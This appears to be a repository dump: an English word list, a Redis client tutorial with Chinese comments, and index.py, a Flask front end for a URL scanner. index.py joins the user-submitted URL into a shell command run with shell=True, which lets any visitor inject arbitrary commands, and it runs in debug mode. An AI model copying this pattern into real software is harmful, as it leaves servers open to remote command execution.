 104 | attach
 105 | attack
 106 | attempt
 107 | attend
 108 | attention
 109 | automobile
 110 | autumn
 111 | available
 112 | average
 113 | avoid
 114 | awake
 115 | award
 116 | away
 117 | baby
 118 | back
 119 | bad
 120 | balance
 121 | ball
 122 | balloon
 123 | ballot
 124 | ban
 125 | bank
 126 | bar
 127 | barrier
 128 | base
 129 | battle
 130 | be
 131 | beat
 132 | beauty
 133 | because
 134 | become
 135 | bed
 136 | before
 137 | begin
 138 | behavior
 139 | behind
 140 | believe
 141 | belong
 142 | below
 143 | best
 144 | betray
 145 | better
 146 | between
 147 | big
 148 | bill
 149 | biology
 150 | bird
 151 | bite
 152 | black
 153 | blame
 154 | bleed
 155 | blind
 156 | block
 157 | blood
 158 | blow
 159 | blue
 160 | boat
 161 | body
 162 | boil
 163 | bomb
 164 | bone
 165 | book
 166 | border
 167 | born
 168 | borrow
 169 | both
 170 | bottle
 171 | bottom
 172 | box
 173 | boy
 174 | boycott
 175 | brain
 176 | brave
 177 | bread
 178 | break
 179 | breathe
 180 | bridge
 181 | brief
 182 | bright
 183 | bring
 184 | broadcast
 185 | brother
 186 | brown
 187 | budget
 188 | build
 189 | building
 190 | bullet
 191 | burn
 192 | burst
 193 | bury
 194 | bus
 195 | business
 196 | busy
 197 | but
 198 | buy
 199 | by
 200 | cabinet
 201 | call
 202 | calm
 203 | camera
 204 | camp
 205 | campaign
 206 | can
 207 | cancel
 208 | cancer
 209 | candidate
 210 | capital
 211 | capture
 212 | car
 213 | care
 214 | career
 215 | careful
 216 | carry
 217 | case
 218 | cat
 219 | catch
 220 | cause
 221 | ceasefire
 222 | celebrate
 223 | center
 224 | century
 225 | ceremony
 226 | chairman
 227 | champion
 228 | chance
 229 | change
 230 | charge
 231 | chase
 232 | cheat
 233 | cheer
 234 | chemicals
 235 | chemistry
 236 | chief
 237 | child
 238 | children
 239 | choose
 240 | circle
 241 | citizen
 242 | city
 243 | civilian
 244 | civilrights
 245 | claim
 246 | clash
 247 | class
 248 | clean
 249 | clear
 250 | clergy
 251 | climate
 252 | climb
 253 | clock
 254 | close
 255 | cloth
 256 | clothes
 257 | cloud
 258 | coal
 259 | coalition
 260 | coast
 261 | coffee
 262 | cold
 263 | collapse
 264 | collect
 265 | college
 266 | colony
 267 | color
 268 | combine
 269 | come
 270 | command
 271 | comment
 272 | committee
 273 | common
 274 | communicate
 275 | community
 276 | company
 277 | compare
 278 | compete
 279 | complete
 280 | complex
 281 | compromise
 282 | computer
 283 | concern
 284 | condemn
 285 | condition
 286 | conference
 287 | confirm
 288 | conflict
 289 | congratulate
 290 | Congress
 291 | connect
 292 | conservative
 293 | consider
 294 | constitution
 295 | contact
 296 | contain
 297 | container
 298 | continent
 299 | continue
 300 | control
 301 | convention
 302 | cook
 303 | cool
 304 | cooperate
 305 | copy
 306 | corn
 307 | correct
 308 | corruption
 309 | cost
 310 | cotton
 311 | count
 312 | country
 313 | court
 314 | cover
 315 | cow
 316 | crash
 317 | create
 318 | creature
 319 | credit
 320 | crew
 321 | crime
 322 | criminal
 323 | crisis
 324 | criticize
 325 | crops
 326 | cross
 327 | crowd
 328 | crush
 329 | cry
 330 | culture
 331 | cure
 332 | curfew
 333 | current
 334 | custom
 335 | customs
 336 | cut
 337 | dam
 338 | damage
 339 | dance
 340 | danger
 341 | dark
 342 | date
 343 | daughter
 344 | day
 345 | dead
 346 | deaf
 347 | deal
 348 | debate
 349 | debt
 350 | decide
 351 | declare
 352 | decrease
 353 | deep
 354 | defeat
 355 | defend
 356 | deficit
 357 | define
 358 | degree
 359 | delay
 360 | delegate
 361 | demand
 362 | democracy
 363 | demonstrate
 364 | denounce
 365 | deny
 366 | depend
 367 | deplore
 368 | deploy
 369 | depression
 370 | describe
 371 | desert
 372 | design
 373 | desire
 374 | destroy
 375 | detail
 376 | detain
 377 | develop
 378 | device
 379 | dictator
 380 | die
 381 | diet
 382 | different
 383 | difficult
 384 | dig
 385 | dinner
 386 | diplomat
 387 | direct
 388 | direction
 389 | dirt
 390 | disappear
 391 | disarm
 392 | disaster
 393 | discover
 394 | discrimination
 395 | discuss
 396 | disease
 397 | dismiss
 398 | dispute
 399 | dissident
 400 | distance
 401 | dive
 402 | divide
 403 | do
 404 | doctor
 405 | document
 406 | dog
 407 | dollar
 408 | donate
 409 | door
 410 | double
 411 | down
 412 | dream
 413 | drink
 414 | drive
 415 | drop
 416 | drown
 417 | drug
 418 | dry
 419 | during
 420 | dust
 421 | duty
 422 | each
 423 | early
 424 | earn
 425 | earth
 426 | earthquake
 427 | ease
 428 | east
 429 | easy
 430 | eat
 431 | ecology
 432 | economy
 433 | edge
 434 | education
 435 | effect
 436 | effort
 437 | egg
 438 | either
 439 | elect
 440 | electricity
 441 | embassy
 442 | embryo
 443 | emergency
 444 | emotion
 445 | employ
 446 | empty
 447 | end
 448 | enemy
 449 | energy
 450 | enforce
 451 | engine
 452 | engineer
 453 | enjoy
 454 | enough
 455 | enter
 456 | environment
 457 | equal
 458 | equipment
 459 | escape
 460 | especially
 461 | establish
 462 | estimate
 463 | ethnic
 464 | evaporate
 465 | even
 466 | event
 467 | ever
 468 | every
 469 | evidence
 470 | evil
 471 | exact
 472 | examine
 473 | example
 474 | excellent
 475 | except
 476 | exchange
 477 | excuse
 478 | execute
 479 | exercise
 480 | exile
 481 | exist
 482 | expand
 483 | expect
 484 | expel
 485 | experience
 486 | experiment
 487 | expert
 488 | explain
 489 | explode
 490 | explore
 491 | export
 492 | express
 493 | extend
 494 | extra
 495 | extraordinary
 496 | extreme
 497 | extremist
 498 | face
 499 | fact
 500 | factory
 501 | fail
 502 | fair
 503 | fall
 504 | false
 505 | family
 506 | famous
 507 | fan
 508 | far
 509 | farm
 510 | fast
 511 | fat
 512 | father
 513 | favorite
 514 | fear
 515 | federal
 516 | feed
 517 | feel
 518 | female
 519 | fence
 520 | fertile
 521 | few
 522 | field
 523 | fierce
 524 | fight
 525 | fill
 526 | film
 527 | final
 528 | financial
 529 | find
 530 | fine
 531 | finish
 532 | fire
 533 | fireworks
 534 | firm
 535 | first
 536 | fish
 537 | fit
 538 | fix
 539 | flag
 540 | flat
 541 | flee
 542 | float
 543 | flood
 544 | floor
 545 | flow
 546 | flower
 547 | fluid
 548 | fly
 549 | fog
 550 | follow
 551 | food
 552 | fool
 553 | foot
 554 | for
 555 | force
 556 | foreign
 557 | forest
 558 | forget
 559 | forgive
 560 | form
 561 | former
 562 | forward
 563 | free
 564 | freedom
 565 | freeze
 566 | fresh
 567 | friend
 568 | frighten
 569 | from
 570 | front
 571 | fruit
 572 | fuel
 573 | full
 574 | fun
 575 | funeral
 576 | future
 577 | gain
 578 | game
 579 | gas
 580 | gather
 581 | general
 582 | generation
 583 | genocide
 584 | gentle
 585 | get
 586 | gift
 587 | girl
 588 | give
 589 | glass
 590 | go
 591 | goal
 592 | god
 593 | gold
 594 | good
 595 | goods
 596 | govern
 597 | government
 598 | grain
 599 | grass
 600 | gray
 601 | great
 602 | green
 603 | grind
 604 | ground
 605 | group
 606 | grow
 607 | guarantee
 608 | guard
 609 | guerrilla
 610 | guide
 611 | guilty
 612 | gun
 613 | hair
 614 | half
 615 | halt
 616 | hang
 617 | happen
 618 | happy
 619 | hard
 620 | harm
 621 | harvest
 622 | hat
 623 | hate
 624 | have
 625 | he
 626 | head
 627 | headquarters
 628 | heal
 629 | health
 630 | hear
 631 | heat
 632 | heavy
 633 | helicopter
 634 | help
 635 | here
 636 | hero
 637 | hide
 638 | high
 639 | hijack
 640 | hill
 641 | history
 642 | hit
 643 | hold
 644 | hole
 645 | holiday
 646 | holy
 647 | home
 648 | honest
 649 | honor
 650 | hope
 651 | horrible
 652 | horse
 653 | hospital
 654 | hostage
 655 | hostile
 656 | hot
 657 | hotel
 658 | hour
 659 | house
 660 | how
 661 | however
 662 | huge
 663 | human
 664 | humor
 665 | hunger
 666 | hunt
 667 | hurry
 668 | hurt
 669 | husband
 670 | I
 671 | ice
 672 | idea
 673 | identify
 674 | if
 675 | ignore
 676 | illegal
 677 | imagine
 678 | immediate
 679 | immigrant
 680 | import
 681 | important
 682 | improve
 683 | in
 684 | incident
 685 | incite
 686 | include
 687 | increase
 688 | independent
 689 | individual
 690 | industry
 691 | infect
 692 | inflation
 693 | influence
 694 | inform
 695 | information
 696 | inject
 697 | injure
 698 | innocent
 699 | insane
 700 | insect
 701 | inspect
 702 | instead
 703 | instrument
 704 | insult
 705 | intelligence
 706 | intelligent
 707 | intense
 708 | interest
 709 | interfere
 710 | international
 711 | Internet
 712 | intervene
 713 | invade
 714 | invent
 715 | invest
 716 | investigate
 717 | invite
 718 | involve
 719 | iron
 720 | island
 721 | issue
 722 | it
 723 | jail
 724 | jewel
 725 | job
 726 | join
 727 | joint
 728 | joke
 729 | judge
 730 | jump
 731 | jury
 732 | just
 733 | justice
 734 | keep
 735 | kick
 736 | kidnap
 737 | kill
 738 | kind
 739 | kiss
 740 | knife
 741 | know
 742 | knowledge
 743 | labor
 744 | laboratory
 745 | lack
 746 | lake
 747 | land
 748 | language
 749 | large
 750 | last
 751 | late
 752 | laugh
 753 | launch
 754 | law
 755 | lead
 756 | leak
 757 | learn
 758 | leave
 759 | left
 760 | legal
 761 | legislature
 762 | lend
 763 | less
 764 | let
 765 | letter
 766 | level
 767 | liberal
 768 | lie
 769 | life
 770 | lift
 771 | light
 772 | lightning
 773 | like
 774 | limit
 775 | line
 776 | link
 777 | liquid
 778 | list
 779 | listen
 780 | literature
 781 | little
 782 | live
 783 | load
 784 | loan
 785 | local
 786 | lonely
 787 | long
 788 | look
 789 | lose
 790 | loud
 791 | love
 792 | low
 793 | loyal
 794 | luck
 795 | machine
 796 | magazine
 797 | mail
 798 | main
 799 | major
 800 | majority
 801 | make
 802 | male
 803 | man
 804 | manufacture
 805 | many
 806 | map
 807 | march
 808 | mark
 809 | market
 810 | marry
 811 | mass
 812 | mate
 813 | material
 814 | mathematics
 815 | matter
 816 | may
 817 | mayor
 818 | meal
 819 | mean
 820 | measure
 821 | meat
 822 | media
 823 | medicine
 824 | meet
 825 | melt
 826 | member
 827 | memorial
 828 | memory
 829 | mental
 830 | message
 831 | metal
 832 | method
 833 | microscope
 834 | middle
 835 | militant
 836 | military
 837 | militia
 838 | milk
 839 | mind
 840 | mine
 841 | mineral
 842 | minister
 843 | minor
 844 | minority
 845 | minute
 846 | miss
 847 | missile
 848 | missing
 849 | mistake
 850 | mix
 851 | mob
 852 | model
 853 | moderate
 854 | modern
 855 | money
 856 | month
 857 | moon
 858 | moral
 859 | more
 860 | morning
 861 | most
 862 | mother
 863 | motion
 864 | mountain
 865 | mourn
 866 | move
 867 | movement
 868 | movie
 869 | much
 870 | murder
 871 | music
 872 | must
 873 | mystery
 874 | name
 875 | narrow
 876 | nation
 877 | native
 878 | natural
 879 | nature
 880 | navy
 881 | near
 882 | necessary
 883 | need
 884 | negotiate
 885 | neighbor
 886 | neither
 887 | neutral
 888 | never
 889 | new
 890 | news
 891 | next
 892 | nice
 893 | night
 894 | no
 895 | noise
 896 | nominate
 897 | noon
 898 | normal
 899 | north
 900 | not
 901 | note
 902 | nothing
 903 | now
 904 | nowhere
 905 | nuclear
 906 | number
 907 | obey
 908 | object
 909 | observe
 910 | occupy
 911 | ocean
 912 | of
 913 | off
 914 | offensive
 915 | offer
 916 | office
 917 | officer
 918 | official
 919 | often
 920 | oil
 921 | old
 922 | on
 923 | once
 924 | only
 925 | open
 926 | operate
 927 | opinion
 928 | oppose
 929 | opposite
 930 | oppress
 931 | or
 932 | orbit
 933 | order
 934 | organize
 935 | other
 936 | our
 937 | oust
 938 | out
 939 | over
 940 | overthrow
 941 | owe
 942 | own
 943 | pain
 944 | paint
 945 | paper
 946 | parachute
 947 | parade
 948 | pardon
 949 | parent
 950 | parliament
 951 | part
 952 | partner
 953 | party
 954 | pass
 955 | passenger
 956 | passport
 957 | past
 958 | path
 959 | patient
 960 | pay
 961 | peace
 962 | people
 963 | percent
 964 | perfect
 965 | perform
 966 | period
 967 | permanent
 968 | permit
 969 | person
 970 | persuade
 971 | physical
 972 | physics
 973 | picture
 974 | piece
 975 | pig
 976 | pilot
 977 | pipe
 978 | place
 979 | plan
 980 | planet
 981 | plant
 982 | plastic
 983 | play
 984 | please
 985 | plenty
 986 | plot
 987 | poem
 988 | point
 989 | poison
 990 | police
 991 | policy
 992 | politics
 993 | pollute
 994 | poor
 995 | popular
 996 | population
 997 | port
 998 | position
 999 | possess
1000 | possible
1001 | postpone
1002 | pour
1003 | poverty
1004 | power
1005 | praise
1006 | pray
1007 | predict
1008 | pregnant
1009 | present
1010 | president
1011 | press
1012 | pressure
1013 | prevent
1014 | price
1015 | prison
1016 | private
1017 | prize
1018 | probably
1019 | problem
1020 | process
1021 | produce
1022 | profession
1023 | professor
1024 | profit
1025 | program
1026 | progress
1027 | project
1028 | promise
1029 | propaganda
1030 | property
1031 | propose
1032 | protect
1033 | protest
1034 | prove
1035 | provide
1036 | public
1037 | publication
1038 | publish
1039 | pull
1040 | pump
1041 | punish
1042 | purchase
1043 | pure
1044 | purpose
1045 | push
1046 | put
1047 | quality
1048 | question
1049 | quick
1050 | quiet
1051 | race
1052 | radar
1053 | radiation
1054 | radio
1055 | raid
1056 | railroad
1057 | rain
1058 | raise
1059 | rape
1060 | rare
1061 | rate
1062 | reach
1063 | react
1064 | read
1065 | ready
1066 | real
1067 | realistic
1068 | reason
1069 | reasonable
1070 | rebel
1071 | receive
1072 | recent
1073 | recession
1074 | recognize
1075 | record
1076 | recover
1077 | red
1078 | reduce
1079 | reform
1080 | refugee
1081 | refuse
1082 | register
1083 | regret
1084 | reject
1085 | relations
1086 | release
1087 | religion
1088 | remain
1089 | remains
1090 | remember
1091 | remove
1092 | repair
1093 | repeat
1094 | report
1095 | represent
1096 | repress
1097 | request
1098 | require
1099 | rescue
1100 | research
1101 | resign
1102 | resist
1103 | resolution
1104 | resource
1105 | respect
1106 | responsible
1107 | rest
1108 | restaurant
1109 | restrain
1110 | restrict
1111 | result
1112 | retire
1113 | return
1114 | revolt
1115 | rice
1116 | rich
1117 | ride
1118 | right
1119 | riot
1120 | rise
1121 | risk
1122 | river
1123 | road
1124 | rob
1125 | rock
1126 | rocket
1127 | roll
1128 | room
1129 | root
1130 | rope
1131 | rough
1132 | round
1133 | rub
1134 | rubber
1135 | ruin
1136 | rule
1137 | run
1138 | rural
1139 | sabotage
1140 | sacrifice
1141 | sad
1142 | safe
1143 | sail
1144 | sailor
1145 | salt
1146 | same
1147 | sand
1148 | satellite
1149 | satisfy
1150 | save
1151 | say
1152 | school
1153 | science
1154 | sea
1155 | search
1156 | season
1157 | seat
1158 | second
1159 | secret
1160 | security
1161 | see
1162 | seed
1163 | seeking
1164 | seem
1165 | seize
1166 | self
1167 | sell
1168 | Senate
1169 | send
1170 | sense
1171 | sentence
1172 | separate
1173 | series
1174 | serious
1175 | serve
1176 | service
1177 | set
1178 | settle
1179 | several
1180 | severe
1181 | sex
1182 | shake
1183 | shape
1184 | share
1185 | sharp
1186 | she
1187 | sheep
1188 | shell
1189 | shelter
1190 | shine
1191 | ship
1192 | shock
1193 | shoe
1194 | shoot
1195 | short
1196 | should
1197 | shout
1198 | show
1199 | shrink
1200 | sick
1201 | sickness
1202 | side
1203 | sign
1204 | signal
1205 | silence
1206 | silver
1207 | similar
1208 | simple
1209 | since
1210 | sing
1211 | single
1212 | sink
1213 | sister
1214 | sit
1215 | situation
1216 | size
1217 | skeleton
1218 | skill
1219 | skin
1220 | sky
1221 | slave
1222 | sleep
1223 | slide
1224 | slow
1225 | small
1226 | smash
1227 | smell
1228 | smoke
1229 | smooth
1230 | snow
1231 | so
1232 | social
1233 | soft
1234 | soil
1235 | soldier
1236 | solid
1237 | solve
1238 | some
1239 | son
1240 | soon
1241 | sort
1242 | sound
1243 | south
1244 | space
1245 | speak
1246 | special
1247 | speech
1248 | speed
1249 | spend
1250 | spill
1251 | spirit
1252 | split
1253 | sport
1254 | spread
1255 | spring
1256 | spy
1257 | square
1258 | stab
1259 | stand
1260 | star
1261 | start
1262 | starve
1263 | state
1264 | station
1265 | statue
1266 | stay
1267 | steal
1268 | steam
1269 | steel
1270 | step
1271 | stick
1272 | still
1273 | stone
1274 | stop
1275 | store
1276 | storm
1277 | story
1278 | stove
1279 | straight
1280 | strange
1281 | street
1282 | stretch
1283 | strike
1284 | strong
1285 | structure
1286 | struggle
1287 | study
1288 | stupid
1289 | subject
1290 | submarine
1291 | substance
1292 | substitute
1293 | subversion
1294 | succeed
1295 | such
1296 | sudden
1297 | suffer
1298 | sugar
1299 | suggest
1300 | suicide
1301 | summer
1302 | sun
1303 | supervise
1304 | supply
1305 | support
1306 | suppose
1307 | suppress
1308 | sure
1309 | surface
1310 | surplus
1311 | surprise
1312 | surrender
1313 | surround
1314 | survive
1315 | suspect
1316 | suspend
1317 | swallow
1318 | swearin
1319 | sweet
1320 | swim
1321 | sympathy
1322 | system
1323 | take
1324 | talk
1325 | tall
1326 | tank
1327 | target
1328 | taste
1329 | tax
1330 | tea
1331 | teach
1332 | team
1333 | tear
1334 | technical
1335 | technology
1336 | telephone
1337 | telescope
1338 | television
1339 | tell
1340 | temperature
1341 | temporary
1342 | tense
1343 | term
1344 | terrible
1345 | territory
1346 | terror
1347 | terrorist
1348 | test
1349 | than
1350 | thank
1351 | that
1352 | the
1353 | theater
1354 | them
1355 | then
1356 | theory
1357 | there
1358 | these
1359 | they
1360 | thick
1361 | thin
1362 | thing
1363 | think
1364 | third
1365 | this
1366 | threaten
1367 | through
1368 | throw
1369 | tie
1370 | time
1371 | tired
1372 | to
1373 | today
1374 | together
1375 | tomorrow
1376 | tonight
1377 | too
1378 | tool
1379 | top
1380 | torture
1381 | total
1382 | touch
1383 | toward
1384 | town
1385 | trade
1386 | tradition
1387 | traffic
1388 | tragic
1389 | train
1390 | transport
1391 | transportation
1392 | trap
1393 | travel
1394 | treason
1395 | treasure
1396 | treat
1397 | treatment
1398 | treaty
1399 | tree
1400 | trial
1401 | tribe
1402 | trick
1403 | trip
1404 | troops
1405 | trouble
1406 | truce
1407 | truck
1408 | true
1409 | trust
1410 | try
1411 | tube
1412 | turn
1413 | under
1414 | understand
1415 | unite
1416 | universe
1417 | university
1418 | unless
1419 | until
1420 | up
1421 | urge
1422 | urgent
1423 | us
1424 | use
1425 | usual
1426 | vacation
1427 | vaccine
1428 | valley
1429 | value
1430 | vegetable
1431 | vehicle
1432 | version
1433 | very
1434 | veto
1435 | victim
1436 | victory
1437 | video
1438 | village
1439 | violate
1440 | violence
1441 | visa
1442 | visit
1443 | voice
1444 | volcano
1445 | volunteer
1446 | vote
1447 | wages
1448 | wait
1449 | walk
1450 | wall
1451 | want
1452 | war
1453 | warm
1454 | warn
1455 | wash
1456 | waste
1457 | watch
1458 | water
1459 | wave
1460 | way
1461 | we
1462 | weak
1463 | wealth
1464 | weapon
1465 | wear
1466 | weather
1467 | Website
1468 | week
1469 | weigh
1470 | welcome
1471 | well
1472 | west
1473 | wet
1474 | what
1475 | wheat
1476 | wheel
1477 | when
1478 | where
1479 | whether
1480 | which
1481 | while
1482 | white
1483 | who
1484 | whole
1485 | why
1486 | wide
1487 | wife
1488 | wild
1489 | will
1490 | willing
1491 | win
1492 | wind
1493 | window
1494 | winter
1495 | wire
1496 | wise
1497 | wish
1498 | with
1499 | withdraw
1500 | without
1501 | witness
1502 | woman
1503 | wonder
1504 | wonderful
1505 | wood
1506 | word
1507 | work
1508 | world
1509 | worry
1510 | worse
1511 | worth
1512 | wound
1513 | wreck
1514 | wreckage
1515 | write
1516 | wrong
1517 | year
1518 | yellow
1519 | yes
1520 | yesterday
1521 | yet
1522 | you
1523 | young
1524 | zero
1525 | zoo


--------------------------------------------------------------------------------
/index.py:
--------------------------------------------------------------------------------
 1 | from flask import Flask,render_template,url_for,request
 2 | from wtforms import *
 3 | from wtforms.validators import *
 4 | from flask_bootstrap import Bootstrap
 5 | import os,json,subprocess
 6 | #from flask_cache import Cache
 7 | #from AD_Scanner_Base import *
 8 | 
 9 | app=Flask(__name__)
10 | bootstrap=Bootstrap(app)
11 | # cache = Cache(app, config={'CACHE_TYPE': 'redis',
12 | #                            'CACHE_REDIS_HOST': '127.0.0.1',
13 | #                            'CACHE_REDIS_PORT': 6379,
14 | #                            'CACHE_REDIS_PASSWORD': '',
15 | #                            'CACHE_REDIS_DB': 0}     )
16 | 
17 | 
18 | @app.route('/')
19 | @app.route('/',methods=['POST'])
20 | #@cache.cached(timeout=5*60 )
21 | 
22 | 
23 | def index():
24 |     if request.method=='POST':
25 |         url=request.form['URL']
26 |         cmd="python AD_Scanner_Base.py -u "+url
27 |         result= subprocess.Popen (cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
28 |         results=result.stdout.read()
29 |         #err=result.stderr
30 |         res=str(results,encoding="utf-8")
31 |         json.dumps(res)
32 |         return render_template('content.html',result=res)
33 |     else:
34 |         return render_template('AD.html')
35 | 
36 | 
37 | 
38 | if __name__ == "__main__":
39 |     app.run(debug=True)
40 | 
41 | 


--------------------------------------------------------------------------------
/reids_demo.py:
--------------------------------------------------------------------------------
  1 | #Author:Chernobyl   2018/5/3
  2 | import redis
  3 | 
  4 | save_pool = redis.ConnectionPool(host='127.0.0.1', port=6379, decode_responses=True)#开启本地radis
  5 | test1 = redis.Redis(connection_pool=save_pool)#创建一个连接实例
  6 | test2 = redis.Redis(connection_pool=save_pool)#同上，与test1共享一个存储池
  7 | 
  8 | '''
  9 | string操作(key:value)
 10 | '''
 11 | 
 12 | #set(key,value)
 13 | test1.set('set_exp1','aa')
 14 | #set()在Redis中设置值，默认不存在则创建，存在则修改
 15 | '''参数：
 16 | set(name, value, ex=None, px=None, nx=False, xx=False)
 17 | ex，过期时间（秒）
 18 | px，过期时间（毫秒）
 19 | nx，如果设置为True，则只有name不存在时，当前set操作才执行,同setnx(name, value)
 20 | xx，如果设置为True，则只有name存在时，当前set操作才执行
 21 | '''
 22 | 
 23 | #setex(key,value,过期时间（秒）)
 24 | test1.setex('set_exp2','bb',60)
 25 | 
 26 | #psetex(key,过期时间（毫秒）value)
 27 | test1.psetex('set_exp3',60000,'cc')
 28 | 
 29 | #mset(key1=value1,key2=value2......)批量设置值
 30 | test1.mset(mset_exp1='111',mset_exp2='222')
 31 | 
 32 | #取单个值get(key)
 33 | print('get(key):'+test1.get('set_exp1'))
 34 | 
 35 | #mget(key1,key2....)取多个值
 36 | print('mget(keys):'+str(test2.mget('set_exp2','set_exp3')))
 37 | 
 38 | #mget的参数可为list类型
 39 | list1=['mset_exp1','mset_exp2']
 40 | print('mget(key_list):'+str(test2.mget(list1)))
 41 | 
 42 | #getset(key,value)设置新值，返回原值
 43 | print('getset(key,value):'+test1.getset('set_exp1','ttt'))
 44 | 
 45 | #getrange(key, start, end)根据字节获取子序列
 46 | print('getrange(key, start, end):'+test1.getrange('set_exp1',0,1))
 47 | 
 48 | #setrange(name, offset, value)修改字符串内容，从指定字符串索引开始用传入的字串向后替换，如果新值太长时，则向后添加
 49 | test2.setrange('set_exp1',1,'asdassaesafasd')
 50 | print('setrange(name, offset, value):'+test2.get('set_exp1'))
 51 | 
 52 | #strlen(key)返回值的长度
 53 | print('strlen(key):'+str(test2.strlen('set_exp1')))
 54 | 
 55 | test1.set('int',5)
 56 | test1.set('float',5.5)
 57 | 
 58 | #incr(key, amount=1)自增mount对应的值，当mount不存在时，则创建mount＝amount，否则，则自增,amount为自增数(整数)
 59 | print('incr(key, amount=8):'+str(test1.incr('int',amount=8)))#输出13
 60 | print('incr(key,amount=2):'+str(test1.incr('int_2',amount=2)))#创建新key，值为2
 61 | 
 62 | #incrbyfloat(key, amount=1.0)类似于incr
 63 | print('incrbyfloat(key, amount=6.666)'+str(test1.incrbyfloat('float',amount=6.666)))
 64 | 
 65 | #decr(key,amout=1)自减amout
 66 | print('decr(key,amout=1)'+str(test1.decr('int',amount=2)))
 67 | 
 68 | #append(key,value)在value后追加内容
 69 | test2.append('set_exp2','aaaaaaa')
 70 | print('append(key,value)'+test2.get('set_exp2'))
 71 | 
 72 | #setbit(name, offset, value)对二进制表示位进行操作
 73 | 
 74 | #getbit(name, offset)获取name对应值的二进制中某位的值(0或1)
 75 | 
 76 | #bitcount(key, start=None, end=None)获取对应二进制中1的个数
 77 | 
 78 | '''
 79 | hash操作(key:dict)
 80 | '''
 81 | 
 82 | #hset(name, key, value)name对应的hash中设置一个键值对（不存在，则创建，否则，修改）
 83 | test1.hset('hs_test1','dict1','val1')
 84 | 
 85 | #hget(name,key)在name对应的hash中根据key获取value
 86 | print('hget(name,key):'+test1.hget('hs_test1','dict1'))
 87 | 
 88 | #hmset(name, mapping)在name对应的hash中批量设置键值对,mapping为dict组
 89 | test1.hmset('hs_test1',{'k1':'aa','k2':'bb'})
 90 | 
 91 | #hgetall(name)获取name对应hash的所有键值
 92 | print('hgetall(name):'+str(test1.hgetall('hs_test1')))
 93 | 
 94 | #hmget(name, keys)在name对应的hash中获取多个key的值
 95 | li = ['k1','k2']
 96 | print('hmget(name, keys, *args):'+str(test1.hmget('hs_test1','k1','k2')))
 97 | print('hmget(name,key_list):'+str(test1.hmget('hs_test1',li)))
 98 | 
 99 | #hlen(name) 获取hash中键值对的个数
100 | print('hlen(name):'+str(test1.hlen('hs_test1')))
101 | 
102 | #hkeys(name) 获取hash中所有的key的值
103 | print('hkeys(name):'+str(test1.hkeys('hs_test1')))
104 | 
105 | #hvals(name) 获取hash中所有的value的值
106 | print('hvals(name):'+str(test1.hvals('hs_test1')))
107 | 
108 | #hexists(name, key)检查name对应的hash是否存在当前传入的key
109 | print('hexists(name, key):'+str(test1.hexists('hs_test1','dict2')))
110 | 
111 | #hdel(name,*keys)删除指定name对应的key所在的键值对
112 | test1.hdel('hs_test1','dict1')
113 | 
114 | #hincrby(name, key, amount=1)自增hash中key对应的值，不存在则创建key=amount(amount为整数)
115 | 
116 | #hincrbyfloat(name, key, amount=1.0)自增hash中key对应的值，不存在则创建key=amount(amount为浮点数)
117 | 
118 | #hscan(name, cursor=0, match=None, count=None)
119 | 
120 | #hscan_iter(name, match=None, count=None)
121 | 
122 | '''
123 | List操作(key:list)
124 | '''
125 | 
126 | #lpush(name,value(s))在name对应的list中添加元素，每个新的元素都添加到列表的最左边
127 | test1.lpush("list_name",2)
128 | test1.lpush("list_name",3,4,5)#保存在列表中的顺序为5，4，3，2
129 | 
130 | #rpush(name,values)同lpush，但每个新的元素都添加到列表的最右边
131 | 
132 | #lpushx(name,value)在name对应的list中添加元素，只有name已经存在时，值添加到列表的最左边
133 | 
134 | #rpushx(name,value)在name对应的list中添加元素，只有name已经存在时，值添加到列表的最右边
135 | 
136 | #llen(name)name对应的list元素的个数
137 | print('llen(name):'+str(test1.llen('list_name')))
138 | 
139 | #linsert(name, where, refvalue, value))在name对应的列表的某一个值前或后插入一个新值
140 | '''参数：
141 | name: redis的name
142 | where: BEFORE（前）或AFTER（后）
143 | refvalue: 列表内的值
144 | value: 要插入的数据
145 | '''
146 | test1.linsert("list_name","BEFORE","2","SS")#在列表内找到第一个元素2，在它前面插入SS
147 | 
148 | #lset(name, index, value)对list中的某一个索引位置重新赋值
149 | test1.lset("list_name",0,"bbb")
150 | 
151 | #lrem(name, value, num)删除name对应的list中的指定值
152 | ''' 参数：
153 | name:  redis的name
154 | value: 要删除的值
155 | num: num=0 删除列表中所有的指定值；
156 |      num=2 从前到后，删除2个；
157 |      num=-2 从后向前，删除2个
158 | '''
159 | test1.lrem("list_name","SS",num=0)
160 | 
161 | #lpop(name)移除列表的左侧第一个元素，返回值则是该元素
162 | print('lpop(name):'+test1.lpop("list_name"))
163 | 
164 | #lindex(name, index)根据索引获取列表内元素
165 | print('lindex(name, index)'+str(test1.lindex("list_name",1)))
166 | 
167 | #lrange(name, start, end)分片获取元素
168 | print('lrange(name, start, end)'+str(test1.lrange("list_name",0,-1)))
169 | 
170 | #ltrim(name, start, end)移除列表内没有在该索引之内的值
171 | test1.ltrim("list_name",0,2)
172 | 
173 | #rpoplpush(src, dst)从一个列表取出最右边的元素，同时将其添加至另一个列表的最左边
174 | '''参数：
175 | src 要取数据的列表
176 | dst 要添加数据的列表
177 | '''
178 | 
179 | #brpoplpush(src, dst, timeout=0)同rpoplpush，多了个timeout, timeout：取数据的列表没元素后的阻塞时间，0为一直阻塞
180 | 
181 | #blpop(keys, timeout)当给定多个 key 参数时，按参数 key 的先后顺序依次检查各个列表，自左向右弹出第一个非空列表的头元素。
182 | 
183 | #brpop(keys, timeout)同blpop，弹出顺序自右向左
184 | 
185 | '''
186 | Set操作（key:set)
187 | '''
188 | 
189 | #sadd(name,values)给name对应的集合中添加元素
190 | test1.sadd("set_name","aa")
191 | test1.sadd("set_name","aa","bb")
192 | 
193 | #smembers(name)获取name对应的集合的所有成员
194 | 
195 | #scard(name)获取name对应的集合中的元素个数
196 | 
197 | #sdiff(keys, *args)第一个name对应的集合中且不在其他name对应的集合的元素集合
198 | test1.sadd("set_name1","bb","cc","dd")
199 | print('sdiff(keys, *args):'+str(test2.sdiff("set_name","set_name1")))
200 | 
201 | #sdiffstore(dest, keys, *args)相当于把sdiff获取的值加入到dest对应的集合中
202 | 
203 | #sinter(keys, *args)获取多个name对应集合的交集
204 | print('sinter(keys, *args):'+str(test2.sinter("set_name","set_name1")))
205 | 
206 | #sinterstore(dest, keys, *args)获取多个name对应集合的交集，再讲其加入到dest对应的集合中
207 | 
208 | #sunion(keys, *args)获取多个name对应的集合的并集
209 | print('sunion(keys, *args):'+str(test1.sunion("set_name","set_name1")))
210 | 
211 | #sunionstore(dest,keys, *args)获取多个name对应的集合的并集，并将结果保存到dest对应的集合中
212 | 
